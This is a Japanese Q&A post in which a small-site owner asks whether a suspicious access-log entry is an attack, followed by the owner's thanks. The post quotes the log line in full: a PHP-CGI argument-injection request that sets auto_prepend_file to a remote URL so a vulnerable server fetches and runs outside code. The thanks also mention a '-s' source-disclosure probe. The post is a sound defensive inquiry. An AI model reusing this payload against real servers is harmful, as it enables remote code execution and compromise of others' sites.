※ ChatGPTを利用し、要約された質問です(原文:これってサイバー攻撃でしょうか?)
不審なアクセスログが残っているWebサイトへのサイバー攻撃の可能性
このQ&Aのポイント
私が運営するWebサイト(www.example.comとします)に、不審なアクセスログが残っています。
このアクセスログには不正なパラメータや外部ファイルの読み込みが指定されています。
特定のIPアドレスからのアクセスであり、それがタイ国のものであることが判明していますが、実際に使用されているかは不明です。
私が運営するWebサイト(www.example.comとします)に、以下のようなアクセスログが残っていました。
www.example.com/?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt
最後のIPアドレス「61.19.253.26」を調べると、タイ国のもののようですが、使用されていないようです。
これってサイバー攻撃の一種なのでしょうか?
何かしらの情報が盗まれたりした痕跡なのでしょうか?
自分で、ブラウザに上記URLを打ち込んだのですが、反応がありませんでした。
ちなみに、私のサイトはレンタルの共有サーバーで運用しています。
また、全てPHPで作成しており、ルートのindex.phpにパラメータを与えることで、全てのページを表示させるようにしています。
なお、index.phpとcssや画像以外は非公開ディレクトリに置いています。
また、同一契約で上記と同じ公開ディレクトリに複数のWebサイトを作っています。
盗まれたものは取り返せないので仕方がないのですが、危険な攻撃であればセキュリティを高める手段を講じる必要があると感じています。
上記アクセスで何が行われたのか、どのような危険があるのか、ご存じの方がいらっしゃいましたらご教授いただければ幸いです。
よろしくお願いいたします。
お礼
詳しいご回答&ご解説ありがとうございました。 /?-sでアクセスしたところ、ソースは表示されず、画面も遷移しませんでした。 同様のアクセスはこの数日の間に2回だけでしたので、ひとまず安心しました。(接続IPは異なりました) レンタルサーバなのでPHPのバージョンは変更できませんが、大手なのでおそらく大丈夫だと思います。 ありがとうございました。